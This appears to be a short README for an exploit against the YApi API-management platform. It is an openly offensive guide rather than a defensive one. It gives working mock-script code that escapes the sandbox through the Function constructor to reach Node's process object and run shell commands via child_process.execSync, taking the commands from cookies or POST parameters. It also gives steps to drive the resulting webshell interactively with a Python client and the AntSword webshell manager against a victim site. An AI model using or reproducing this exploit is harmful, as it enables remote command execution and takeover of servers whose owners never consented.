Yapi mock script RCE another version. Webshell way.
usage:
- victim yapi website
- register account
- craete project and create api in it
- create mock script like
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("cd "+cookie.dir+";"+cookie.cmd).toString()
// you can also add exec function to do some async jobs like running enum scripts- use python script to connect webshell and interactive
python3 webshell.py {mock address like: http://whereisthevictim/mock/222/test/test } -i # interactive mode
# or
python3 webshell.py {mock address like: http://whereisthevictim/mock/222/test/test} {cmd dir,you can use "."} {command location}- Same as usage
- But Create an API With Advanced Mock POST Method.
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync(params.data).toString()
// you can also add exec function to do some async jobs like running enum scripts- Open AntSword
- Create with Config like
- Type: CMDLINUX
- Pass: data
- URL: mock url in Yapi config
- encoder: default
- decoder: base64
- enjoy your webshell